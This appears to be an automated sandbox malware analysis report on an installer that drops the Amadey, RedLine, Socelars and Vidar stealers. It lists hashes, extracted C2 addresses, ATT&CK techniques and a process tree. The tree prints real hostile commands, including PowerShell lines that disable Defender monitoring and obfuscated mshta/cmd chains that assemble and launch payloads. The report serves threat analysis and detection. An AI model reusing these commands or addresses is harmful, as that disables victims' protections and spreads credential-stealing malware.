amadey | edceb274c572ba560f1f27c5d97991b9b56a2bce8daf617f2b4c9bbbe5008db4

Analysis

max time kernel
257s
max time network
3886s
platform
windows11_x64
resource
win11
submitted
14-11-2021 09:04

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

8.4MB
MD5

dc3279eab20f1e9cff2a573c1f9ef8ee
SHA1

049e214cd7dc62c2d409c8cc060dcd9bcc6dcfc2
SHA256

edceb274c572ba560f1f27c5d97991b9b56a2bce8daf617f2b4c9bbbe5008db4
SHA512

eaa28ef57863778175b0efc8075b7ad2909ef4d90efdc144db318d414e64ed5e0334c8fef656bd3286e05102676b780f7b754e23cf75f15797faa62fcf69fb3a

Score

10^/10

amadey redline socelars vidar media13111 aspackv2 evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

socelars

http://www.hhgenice.top/

Extracted

Family

amadey

Version

2.82

185.215.113.45/g4MbvE/index.php

Extracted

Family

redline

Botnet

media13111

91.121.67.60:51630

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6124	4840	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	4840	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6036	4840	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral4/memory/3048-322-0x0000000000000000-mapping.dmp	family_redline
behavioral4/memory/3048-324-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07d46efb4bd1.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07d46efb4bd1.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 3180 created 4556 3180 WerFault.exe Sun07d7bdaf7c.exe
PID 5552 created 852 5552 WerFault.exe Sun07d46efb4bd1.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 3180 created 4556	3180	WerFault.exe	Sun07d7bdaf7c.exe
PID 5552 created 852	5552	WerFault.exe	Sun07d46efb4bd1.exe

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral4/memory/5984-452-0x00000000022C0000-0x0000000002395000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\libstdc++-6.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 38 IoCs

Processes:

setup_installer.exesetup_install.exeSun0746b3c4631.exeSun07f05cf99e017109.exeSun075d5a7849d7670a.exeSun07923b89b57.exeSun0768bf0e01cf08ac5.exeSun078a90701e.exeSun07e5c589dd5d.exeSun07e840e6fb5.exeSun07bb82f51727fc79.exeSun0746b3c4631.tmpSun07a9799f68e7.exeSun073980a935.exeSun07d7bdaf7c.exeSun07610e6b216b74271.exeSun07d46efb4bd1.exeSun07a9799f68e7.exeSun07e840e6fb5.tmpSun07e5c589dd5d.exeSun07e840e6fb5.exeSun07e840e6fb5.tmpsvchost.exetkools.exe1522257.exe8899672.exe5473224.exe8S~LNTCBHnm.exelF3l8dayrMRbKxaOUKUQ34vB.exe5705.exe4699309.exeSoftwareInstaller2191.exeWorldoffer.exeinst1.exechrome.exechrome update.exe8150769.exechrome1.exe

pid	process
2476	setup_installer.exe
3200	setup_install.exe
1340	Sun0746b3c4631.exe
3512	Sun07f05cf99e017109.exe
4352	Sun075d5a7849d7670a.exe
2284	Sun07923b89b57.exe
2532	Sun0768bf0e01cf08ac5.exe
3792	Sun078a90701e.exe
2268	Sun07e5c589dd5d.exe
2060	Sun07e840e6fb5.exe
5108	Sun07bb82f51727fc79.exe
1416	Sun0746b3c4631.tmp
3192	Sun07a9799f68e7.exe
4984	Sun073980a935.exe
4556	Sun07d7bdaf7c.exe
3500	Sun07610e6b216b74271.exe
852	Sun07d46efb4bd1.exe
4512	Sun07a9799f68e7.exe
1108	Sun07e840e6fb5.tmp
4800	Sun07e5c589dd5d.exe
2612	Sun07e840e6fb5.exe
2004	Sun07e840e6fb5.tmp
3620	svchost.exe
1380	tkools.exe
2568	1522257.exe
3048	8899672.exe
5148	5473224.exe
5188	8S~LNTCBHnm.exe
5240	lF3l8dayrMRbKxaOUKUQ34vB.exe
5308	5705.exe
5768	4699309.exe
5872	SoftwareInstaller2191.exe
5984	Worldoffer.exe
6048	inst1.exe
6132	chrome.exe
5280	chrome update.exe
4492	8150769.exe
4820	chrome1.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5705.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5705.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5705.exe

Loads dropped DLL 9 IoCs

Processes:

setup_install.exeSun0746b3c4631.tmpSun07e840e6fb5.tmpSun07e840e6fb5.tmprundll32.exe

pid	process
3200	setup_install.exe
3200	setup_install.exe
3200	setup_install.exe
3200	setup_install.exe
3200	setup_install.exe
1416	Sun0746b3c4631.tmp
1108	Sun07e840e6fb5.tmp
2004	Sun07e840e6fb5.tmp
2940	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5473224.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5473224.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

5705.exe4699309.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5705.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4699309.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

119 ip-api.com
322 ipinfo.io
2 ipinfo.io
83 ipinfo.io
94 ipinfo.io
119 ipinfo.io
234 ipinfo.io
258 ipinfo.io
2 ip-api.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

5705.exe4699309.exe

pid process

5308 5705.exe
5768 4699309.exe

flow	ioc
119	ip-api.com
322	ipinfo.io
2	ipinfo.io
83	ipinfo.io
94	ipinfo.io
119	ipinfo.io
234	ipinfo.io
258	ipinfo.io
2	ip-api.com

pid	process
5308	5705.exe
5768	4699309.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Sun07a9799f68e7.exeSun07610e6b216b74271.exe

description	pid	process	target process
PID 3192 set thread context of 4512	3192	Sun07a9799f68e7.exe	Sun07a9799f68e7.exe
PID 3500 set thread context of 3048	3500	Sun07610e6b216b74271.exe	8899672.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 21 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4044	4556	WerFault.exe	Sun07d7bdaf7c.exe
5732	852	WerFault.exe	Sun07d46efb4bd1.exe
5856	2940	WerFault.exe	rundll32.exe
2844	6132	WerFault.exe	chrome.exe
4060	5984	WerFault.exe	Worldoffer.exe
5704	4820	WerFault.exe	chrome1.exe
3144	5280	WerFault.exe	chrome update.exe
5292	5304	WerFault.exe	chrome3.exe
5880	4024	WerFault.exe	rundll32.exe
4372	5680	WerFault.exe	tthZl90LGkJrqQQcNbE_RIIw.exe
2476	6068	WerFault.exe	q36rvWSsQ35eoIM91iuUhdYO.exe
2960	1108	WerFault.exe	oMPvqs9BYxwt4QZsNYP_OzOQ.exe
2880	5252	WerFault.exe	Bj6d79cfOfT2JK4QNWwZdBfc.exe
3512	4228	WerFault.exe	5U4q0MWFWfPGXF7QVaR6grOt.exe
5612	4736	WerFault.exe	8B9LzrqGUoHgHm39uvZEwLJx.exe
2592	2464	WerFault.exe	caKVARifz253bzwR35VKTIK0.exe
5464	5584	WerFault.exe	9hj9Ir3xHdjAPQKVlbdPXTT1.exe
1356	4508	WerFault.exe	osLbX8ysn3HuqnL6Xr4Zssfk.exe
1712	1604	WerFault.exe	bR2twElFJGIuu6TQPA9wniDV.exe
5628	3340	WerFault.exe	C292.exe
3960	5776	WerFault.exe	rundll32.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3100 schtasks.exe
2132 schtasks.exe
5580 schtasks.exe
2868 schtasks.exe
5740 schtasks.exe

pid	process
3100	schtasks.exe
2132	schtasks.exe
5580	schtasks.exe
2868	schtasks.exe
5740	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5408 taskkill.exe
6092 taskkill.exe
3856 taskkill.exe
2800 taskkill.exe
5196 taskkill.exe

pid	process
5408	taskkill.exe
6092	taskkill.exe
3856	taskkill.exe
2800	taskkill.exe
5196	taskkill.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exeWerFault.exe5705.exeWerFault.exe4699309.exe

pid	process
1932	powershell.exe
1932	powershell.exe
2192	powershell.exe
2192	powershell.exe
1932	powershell.exe
2192	powershell.exe
4044	WerFault.exe
4044	WerFault.exe
5308	5705.exe
5308	5705.exe
5732	WerFault.exe
5732	WerFault.exe
5768	4699309.exe
5768	4699309.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

Sun07d46efb4bd1.exepowershell.exepowershell.exeSun078a90701e.exeSun07923b89b57.exeWerFault.exetaskkill.exechrome.exechrome update.exeSoftwareInstaller2191.exe

description	pid	process
Token: SeCreateTokenPrivilege	852	Sun07d46efb4bd1.exe
Token: SeAssignPrimaryTokenPrivilege	852	Sun07d46efb4bd1.exe
Token: SeLockMemoryPrivilege	852	Sun07d46efb4bd1.exe
Token: SeIncreaseQuotaPrivilege	852	Sun07d46efb4bd1.exe
Token: SeMachineAccountPrivilege	852	Sun07d46efb4bd1.exe
Token: SeTcbPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSecurityPrivilege	852	Sun07d46efb4bd1.exe
Token: SeTakeOwnershipPrivilege	852	Sun07d46efb4bd1.exe
Token: SeLoadDriverPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSystemProfilePrivilege	852	Sun07d46efb4bd1.exe
Token: SeSystemtimePrivilege	852	Sun07d46efb4bd1.exe
Token: SeProfSingleProcessPrivilege	852	Sun07d46efb4bd1.exe
Token: SeIncBasePriorityPrivilege	852	Sun07d46efb4bd1.exe
Token: SeCreatePagefilePrivilege	852	Sun07d46efb4bd1.exe
Token: SeCreatePermanentPrivilege	852	Sun07d46efb4bd1.exe
Token: SeBackupPrivilege	852	Sun07d46efb4bd1.exe
Token: SeRestorePrivilege	852	Sun07d46efb4bd1.exe
Token: SeShutdownPrivilege	852	Sun07d46efb4bd1.exe
Token: SeDebugPrivilege	852	Sun07d46efb4bd1.exe
Token: SeAuditPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSystemEnvironmentPrivilege	852	Sun07d46efb4bd1.exe
Token: SeChangeNotifyPrivilege	852	Sun07d46efb4bd1.exe
Token: SeRemoteShutdownPrivilege	852	Sun07d46efb4bd1.exe
Token: SeUndockPrivilege	852	Sun07d46efb4bd1.exe
Token: SeSyncAgentPrivilege	852	Sun07d46efb4bd1.exe
Token: SeEnableDelegationPrivilege	852	Sun07d46efb4bd1.exe
Token: SeManageVolumePrivilege	852	Sun07d46efb4bd1.exe
Token: SeImpersonatePrivilege	852	Sun07d46efb4bd1.exe
Token: SeCreateGlobalPrivilege	852	Sun07d46efb4bd1.exe
Token: 31	852	Sun07d46efb4bd1.exe
Token: 32	852	Sun07d46efb4bd1.exe
Token: 33	852	Sun07d46efb4bd1.exe
Token: 34	852	Sun07d46efb4bd1.exe
Token: 35	852	Sun07d46efb4bd1.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	3792	Sun078a90701e.exe
Token: SeDebugPrivilege	2284	Sun07923b89b57.exe
Token: SeRestorePrivilege	4044	WerFault.exe
Token: SeBackupPrivilege	4044	WerFault.exe
Token: SeDebugPrivilege	5408	taskkill.exe
Token: SeDebugPrivilege	6132	chrome.exe
Token: SeDebugPrivilege	5280	chrome update.exe
Token: SeDebugPrivilege	5872	SoftwareInstaller2191.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1108 wrote to memory of 2476	1108	setup_x86_x64_install.exe	setup_installer.exe
PID 1108 wrote to memory of 2476	1108	setup_x86_x64_install.exe	setup_installer.exe
PID 1108 wrote to memory of 2476	1108	setup_x86_x64_install.exe	setup_installer.exe
PID 2476 wrote to memory of 3200	2476	setup_installer.exe	setup_install.exe
PID 2476 wrote to memory of 3200	2476	setup_installer.exe	setup_install.exe
PID 2476 wrote to memory of 3200	2476	setup_installer.exe	setup_install.exe
PID 3200 wrote to memory of 2584	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2584	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2584	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2976	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2976	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2976	3200	setup_install.exe	cmd.exe
PID 2584 wrote to memory of 1932	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 1932	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 1932	2584	cmd.exe	powershell.exe
PID 2976 wrote to memory of 2192	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 2192	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 2192	2976	cmd.exe	powershell.exe
PID 3200 wrote to memory of 1788	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 1788	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 1788	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2208	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2208	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2208	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2156	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2156	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2156	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 4280	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 4280	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 4280	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3168	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3168	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3168	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 4796	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 4796	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 4796	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2808	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2808	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2808	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2824	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2824	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2824	3200	setup_install.exe	cmd.exe
PID 3168 wrote to memory of 1340	3168	cmd.exe	Sun0746b3c4631.exe
PID 3168 wrote to memory of 1340	3168	cmd.exe	Sun0746b3c4631.exe
PID 3168 wrote to memory of 1340	3168	cmd.exe	Sun0746b3c4631.exe
PID 1788 wrote to memory of 3512	1788	cmd.exe	Sun07f05cf99e017109.exe
PID 1788 wrote to memory of 3512	1788	cmd.exe	Sun07f05cf99e017109.exe
PID 1788 wrote to memory of 3512	1788	cmd.exe	Sun07f05cf99e017109.exe
PID 3200 wrote to memory of 3420	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3420	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3420	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3980	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3980	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3980	3200	setup_install.exe	cmd.exe
PID 2824 wrote to memory of 4352	2824	cmd.exe	Sun075d5a7849d7670a.exe
PID 2824 wrote to memory of 4352	2824	cmd.exe	Sun075d5a7849d7670a.exe
PID 3200 wrote to memory of 1068	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 1068	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 1068	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3764	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3764	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 3764	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2852	3200	setup_install.exe	cmd.exe
PID 3200 wrote to memory of 2852	3200	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun07f05cf99e017109.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1788
    - - C:\Users\Admin\AppData\Local\Temp\7zSCA94E8F3\Sun07f05cf99e017109.exe
        
        Sun07f05cf99e017109.exe
        5⤵
        Executes dropped EXE
        
        PID:3512
      - C:\Users\Admin\Pictures\Adobe Films\JY8sbKmrkn0UQsS35Nbc8DtJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JY8sbKmrkn0UQsS35Nbc8DtJ.exe"
        6⤵
        
        PID:5076
      - C:\Users\Admin\Pictures\Adobe Films\osLbX8ysn3HuqnL6Xr4Zssfk.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\osLbX8ysn3HuqnL6Xr4Zssfk.exe"
        6⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 292
        7⤵
        Program crash
        
        PID:1356
      - C:\Users\Admin\Pictures\Adobe Films\9hj9Ir3xHdjAPQKVlbdPXTT1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\9hj9Ir3xHdjAPQKVlbdPXTT1.exe"
        6⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 276
        7⤵
        Program crash
        
        PID:5464
      - C:\Users\Admin\Pictures\Adobe Films\3fADJaWYEbUJhXYclYnPj4mM.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3fADJaWYEbUJhXYclYnPj4mM.exe"
        6⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Roaming\4977687.exe
        
        "C:\Users\Admin\AppData\Roaming\4977687.exe"
        7⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Roaming\8899672.exe
        
        "C:\Users\Admin\AppData\Roaming\8899672.exe"
        7⤵
        Executes dropped EXE
        
        PID:3048
        
        C:\Users\Admin\AppData\Roaming\7370764.exe
        
        "C:\Users\Admin\AppData\Roaming\7370764.exe"
        7⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Roaming\1174937.exe
        
        "C:\Users\Admin\AppData\Roaming\1174937.exe"
        7⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Roaming\4812454.exe
        
        "C:\Users\Admin\AppData\Roaming\4812454.exe"
        7⤵
        
        PID:5940
        
        C:\Users\Admin\AppData\Roaming\3940129.exe
        
        "C:\Users\Admin\AppData\Roaming\3940129.exe"
        7⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\3940129.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\3940129.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        8⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\3940129.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\3940129.exe" ) do taskkill -F -IM "%~Nxv"
        9⤵
        
        PID:848
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -IM "3940129.exe"
        10⤵
        Kills process with taskkill
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\Qw5u.exe
        
        Qw5U.Exe -PmowtdFUhhnCoUk
        10⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk ""== """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
        11⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "-PmowtdFUhhnCoUk "== "" for %v In ("C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" ) do taskkill -F -IM "%~Nxv"
        12⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIPt:CloSE( cREateOBJecT ( "WscRipt.SHeLl").Run("CMD /Q /C ECHO | sEt /P = ""MZ"" > IEEeXE.7YX & CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ ",0,tRUE) )
        11⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C ECHO | sEt /P = "MZ" > IEEeXE.7YX&CoPY /b /Y IEEeXE.7YX+WWgJAR1.EZ +zYEV.3Cu+ NUvL.Bf2 B0M3yFV5.lRJ &del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ
        12⤵
        
        PID:6784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
        13⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>IEEeXE.7YX"
        13⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\control.exe
        
        control.exe .\B0M3YFV5.lRJ
        13⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ
        14⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Roaming\8764124.exe
        
        "C:\Users\Admin\AppData\Roaming\8764124.exe"
        7⤵
        
        PID:2760
      - C:\Users\Admin\Pictures\Adobe Films\eyHaWTkg87FCx1zh9UGQaWFt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\eyHaWTkg87FCx1zh9UGQaWFt.exe"
        6⤵
        
        PID:1544
        
        C:\Program Files (x86)\Company\NewProduct\cm3.exe
        
